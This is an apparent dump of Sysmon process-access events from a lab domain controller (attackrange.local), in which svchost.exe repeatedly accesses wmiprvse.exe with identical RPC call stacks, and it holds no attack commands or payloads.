15:51:06.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001076Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001075Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001074Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001073Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001072Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001071Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001070Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001069Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001068Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001067Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001066Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001065Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001064Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001063Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001062Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.003{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001061Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.988{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001060Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.988{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001059Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.988{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001058Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.988{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001057Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.988{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001056Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.988{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001055Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.988{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001054Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.988{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001053Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.988{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.d